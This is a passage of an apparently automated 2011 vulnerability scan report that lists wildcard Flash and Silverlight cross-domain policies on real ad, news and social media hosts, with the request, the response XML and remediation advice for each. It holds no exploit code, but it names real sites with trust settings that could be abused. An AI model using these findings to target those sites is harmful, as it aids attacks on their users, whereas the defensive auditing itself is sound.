...[SNIP]...

5.16. http://googleads.g.doubleclick.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Thu, 12 May 2011 10:43:52 GMT
Expires: Fri, 13 May 2011 10:43:52 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 1120

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

5.17. http://graphics8.nytimes.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://graphics8.nytimes.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: graphics8.nytimes.com

Response

HTTP/1.0 200 OK
Server: Sun-ONE-Web-Server/6.1
ntCoent-length: 1169
Content-Type: text/xml
Last-Modified: Wed, 21 Jul 2010 15:01:34 GMT
ETag: "491-4c470bce"
Cache-Control: private, max-age=63703
Date: Thu, 12 May 2011 11:02:58 GMT
Content-Length: 1169
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="*.*.nytimes.com" />
   <allow-access-from domain="*.nytimes.com" />
   <allow-access-from domain="*.nytvideo.feedroom.com" />
   <allow-access-from domain="*.www.feedroom.com" />
   <allow-access-from domain="*.chumby.com" />
   <allow-access-from domain="*.createthe.com" />
   <allow-access-from domain="*.predictify.com" />
<allow-access-from domain="*.brightcove.com" />
<allow-access-from domain="*.*.brightcove.com" />
   <allow-access-from domain="*.nytsyndicate.com"/>
   <allow-access-from domain="*.*.nytsyndicate.com"/>
   <allow-access-from domain="xdce.adobe.com" />
   <allow-access-from domain="www.rokkandev.com" />
   <allow-access-from domain="cdn.eyewonder.com" />
   <allow-access-from domain="apps.eyewonderlabs.com" />
   <allow-access-from domain="media.pointroll.com" />
   <allow-access-from domain="speed.pointroll.com" />
<allow-access-from domain="u-sta.unicast.com"/>
<allow-access-from domain="creativeby1.unicast.com"/>
<allow-access-from domain="creativeby2.unicast.com"/>
<allow-access-from domain="picklegroup.com"/>
...[SNIP]...

5.18. http://markets.on.nytimes.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://markets.on.nytimes.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: markets.on.nytimes.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 11:03:52 GMT
Content-Length: 420
Content-Type: text/xml
Last-Modified: Mon, 14 Jul 2008 23:38:14 GMT
Accept-Ranges: bytes
ETag: "b87378afae6c81:3916"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET

<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="*.*.nytimes.com" />
   <allow-access-from domain="*.nytimes.com" />
   <allow-access-from domain="*.nytvideo.feedroom.com" />
   <allow-access-from domain="*.www.feedroom.com" />
   <allow-access-from domain="*.chumby.com" />
   <allow-access-from domain="*.createthe.com" />
   <allow-access-from domain="*.predictify.com" />
...[SNIP]...

5.19. http://media.ft.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://media.ft.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: media.ft.com

Response

HTTP/1.1 200 OK
Content-Length: 1309
Content-Type: text/xml
ETag: "51d-4ba8ec18"
Last-Modified: Tue, 23 Mar 2010 16:28:08 GMT
Accept-Ranges: bytes
Server: Apache/1.3.37
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa CONo OUR DELi BUS IND PHY ONL UNI COM NAV INT DEM PRE OTC"
Date: Thu, 12 May 2011 11:03:18 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.ft.com" secure="true"/>
<allow-access-from domain="*.doubleclick.net" secure="true"/>
<allow-access-from domain="*.2mdn.net" secure="true"/>
<allow-access-from domain="*.dartmotif.net" secure="true"/>
<allow-access-from domain="*.tangozebra.com" secure="true"/>
<allow-access-from domain="*.euronews.net" secure="true"/>
<allow-access-from domain="*.google.com" secure="true"/>
<allow-access-from domain="*.gstatic.com" secure="true"/>
<allow-access-from domain="*.doubleclick.net" secure="false"/>
<allow-access-from domain="*.2mdn.net" secure="false"/>
<allow-access-from domain="*.dartmotif.net" secure="false"/>
<allow-access-from domain="*.doubleclick.net" secure="true"/>
<allow-access-from domain="*.doubleclick.com" secure="true"/>
<allow-access-from domain="*.doubleclick.com" secure="false"/>
<allow-access-from domain="*.2mdn.net" secure="true"/>
<allow-access-from domain="*.dartmotif.net" secure="true"/>
<allow-access-from domain="*.googlesyndication.com" secure="true"/>
<allow-access-from domain="*.brightcove.com" secure="true"/>
<allow-access-from domain="*.google-analytics.com" secure="true"/>
...[SNIP]...

5.20. http://pagead2.googlesyndication.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pagead2.googlesyndication.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: pagead2.googlesyndication.com

Response

HTTP/1.0 200 OK
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Wed, 11 May 2011 19:28:23 GMT
Expires: Thu, 12 May 2011 19:28:23 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 55985

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

5.21. http://pubads.g.doubleclick.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pubads.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: pubads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Thu, 12 May 2011 03:46:12 GMT
Expires: Fri, 13 May 2011 03:46:12 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 26114
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

5.22. http://timespeople.nytimes.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://timespeople.nytimes.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: timespeople.nytimes.com

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Thu, 12 May 2011 11:03:16 GMT
Content-length: 464
Content-type: text/xml
Last-modified: Wed, 10 Mar 2010 02:18:30 GMT
Accept-ranges: bytes
Connection: keep-alive

<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="*.*.nytimes.com" />
   <allow-access-from domain="*.nytimes.com" />
   <allow-access-from domain="*.nytvideo.feedroom.com" />
   <allow-access-from domain="*.www.feedroom.com" />
   <allow-access-from domain="*.chumby.com" />
   <allow-access-from domain="*.*.tremormedia.com" />
   <allow-access-from domain="*.tremormedia.com" />
   <allow-access-from domain="*.brightcove.com" />
...[SNIP]...

5.23. http://www.facebook.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.54.204.51
Connection: close
Content-Length: 1473

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
...[SNIP]...
<allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
...[SNIP]...

5.24. http://www.ft.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ft.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ft.com

Response

HTTP/1.1 200 OK
ETag: "51d-4ba8ec18"
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa CONo OUR DELi BUS IND PHY ONL UNI COM NAV INT DEM PRE OTC"
Accept-Ranges: bytes
Content-Length: 1309
Date: Thu, 12 May 2011 11:03:00 GMT
Connection: close
Last-Modified: Tue, 23 Mar 2010 16:28:08 GMT
Server: Apache/1.3.37
Content-Type: text/xml
Keep-Alive: timeout=1, max=120

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.ft.com" secure="true"/>
<allow-access-from domain="*.doubleclick.net" secure="true"/>
<allow-access-from domain="*.2mdn.net" secure="true"/>
<allow-access-from domain="*.dartmotif.net" secure="true"/>
<allow-access-from domain="*.tangozebra.com" secure="true"/>
<allow-access-from domain="*.euronews.net" secure="true"/>
<allow-access-from domain="*.google.com" secure="true"/>
<allow-access-from domain="*.gstatic.com" secure="true"/>
<allow-access-from domain="*.doubleclick.net" secure="false"/>
<allow-access-from domain="*.2mdn.net" secure="false"/>
<allow-access-from domain="*.dartmotif.net" secure="false"/>
<allow-access-from domain="*.doubleclick.net" secure="true"/>
<allow-access-from domain="*.doubleclick.com" secure="true"/>
<allow-access-from domain="*.doubleclick.com" secure="false"/>
<allow-access-from domain="*.2mdn.net" secure="true"/>
<allow-access-from domain="*.dartmotif.net" secure="true"/>
<allow-access-from domain="*.googlesyndication.com" secure="true"/>
<allow-access-from domain="*.brightcove.com" secure="true"/>
<allow-access-from domain="*.google-analytics.com" secure="true"/>
...[SNIP]...

5.25. http://www.nytimes.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nytimes.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.nytimes.com

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Thu, 12 May 2011 11:03:02 GMT
Content-length: 1169
Content-type: text/xml
Set-cookie: RMID=2dff06a3406f4dcbbe6702e2; expires=Friday, 11-May-2012 11:03:03 GMT; path=/; domain=.nytimes.com
Last-modified: Wed, 21 Jul 2010 15:01:34 GMT
Accept-ranges: bytes
Connection: keep-alive

<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="*.*.nytimes.com" />
   <allow-access-from domain="*.nytimes.com" />
   <allow-access-from domain="*.nytvideo.feedroom.com" />
   <allow-access-from domain="*.www.feedroom.com" />
   <allow-access-from domain="*.chumby.com" />
   <allow-access-from domain="*.createthe.com" />
   <allow-access-from domain="*.predictify.com" />
<allow-access-from domain="*.brightcove.com" />
<allow-access-from domain="*.*.brightcove.com" />
   <allow-access-from domain="*.nytsyndicate.com"/>
   <allow-access-from domain="*.*.nytsyndicate.com"/>
   <allow-access-from domain="xdce.adobe.com" />
   <allow-access-from domain="www.rokkandev.com" />
   <allow-access-from domain="cdn.eyewonder.com" />
   <allow-access-from domain="apps.eyewonderlabs.com" />
   <allow-access-from domain="media.pointroll.com" />
   <allow-access-from domain="speed.pointroll.com" />
<allow-access-from domain="u-sta.unicast.com"/>
<allow-access-from domain="creativeby1.unicast.com"/>
<allow-access-from domain="creativeby2.unicast.com"/>
<allow-access-from domain="picklegroup.com"/>
...[SNIP]...

5.26. http://pillsburylaw.app4.hubspot.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pillsburylaw.app4.hubspot.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: pillsburylaw.app4.hubspot.com

Response

HTTP/1.1 200 OK
Content-Length: 206
Content-Type: text/xml
Last-Modified: Wed, 17 Oct 2007 22:47:20 GMT
Accept-Ranges: bytes
ETag: "04cb8acf11c81:cb38"
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 12:21:51 GMT
Connection: close
Set-Cookie: HUBSPOT95=521213100.0.0000; path=/

<?xml version="1.0" ?>
<!DOCTYPE cross-domain-policy (View Source for full doctype...)>
- <cross-domain-policy>
<allow-access-from domain="www.bluemedia.com" secure="true" />
</cross-domain-p
...[SNIP]...

5.27. http://stats.ft.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stats.ft.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: stats.ft.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:03:34 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 24 Nov 2005 11:41:30 GMT
ETag: "7681a8-12e-4064e1e280e80"
Accept-Ranges: bytes
Content-Length: 302
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.axappphealthcare.co.uk" />
<allow-access-from domain="www.axappphealthcarecampaign.co.uk" />
...[SNIP]...

6. Silverlight cross-domain policy
There are 4 instances of this issue:

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


6.1. http://ad.doubleclick.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Wed, 21 May 2008 19:54:04 GMT
Date: Thu, 12 May 2011 11:01:15 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

6.2. http://ad.us.doubleclick.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.us.doubleclick.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.us.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Wed, 21 May 2008 19:54:04 GMT
Date: Thu, 12 May 2011 11:03:16 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

6.3. http://b.scorecardresearch.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Fri, 13 May 2011 11:04:16 GMT
Date: Thu, 12 May 2011 11:04:16 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...

6.4. http://secure-us.imrworldwide.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-us.imrworldwide.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

